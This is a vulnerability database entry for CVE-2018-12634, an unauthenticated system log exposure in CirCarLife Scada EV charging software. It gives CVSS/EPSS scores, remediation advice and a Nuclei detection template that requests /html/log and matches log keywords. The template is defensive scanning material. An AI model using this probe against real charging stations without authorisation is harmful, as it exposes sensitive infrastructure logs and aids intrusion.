Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-12634
HistoryApr 24, 2021 - 3:44 p.m.

CirCarLife Scada <4.3 - System Log Exposure

2021-04-2415:44:07
ProjectDiscovery
github.com
9
cve
cve2018
scada
circontrol
circarlife
logs
edb
vulnerability
sensitive information

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.1

Confidence

High

EPSS

0.944

Percentile

99.2%

CirCarLife Scada before 4.3 allows remote attackers to obtain sensitive information via a direct request for the html/log or services/system/info.html URI. CirCarLife is an internet-connected electric vehicle charging station.

id: CVE-2018-12634

info:
  name: CirCarLife Scada <4.3 - System Log Exposure
  author: geeknik
  severity: critical
  description: CirCarLife Scada before 4.3 allows remote attackers to obtain sensitive information via a direct request for the html/log or services/system/info.html URI. CirCarLife is an internet-connected electric vehicle charging station.
  impact: |
    An attacker can gain access to sensitive system logs, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade CirCarLife Scada to version 4.3 or above to fix the system log exposure vulnerability.
  reference:
    - https://circontrol.com/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-12634
    - https://www.seebug.org/vuldb/ssvid-97353
    - https://www.exploit-db.com/exploits/45384/
    - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-12634
    cwe-id: CWE-200
    epss-score: 0.94448
    epss-percentile: 0.99209
    cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: circontrol
    product: circarlife_scada
  tags: cve,cve2018,scada,circontrol,circarlife,logs,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/html/log"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "CirCarLife Scada"

      - type: word
        words:
          - "user.debug"
          - "user.info"
          - "EVSE"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022070d438b8deca8262b388a1ac84d7a28612a28f7eb0ec72da39762e02a9ab2c6e02205bdbf452ac32f90703c55fbb539c9a91679e39359fcbaf302d82948f56a6b57b:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.1

Confidence

High

EPSS

0.944

Percentile

99.2%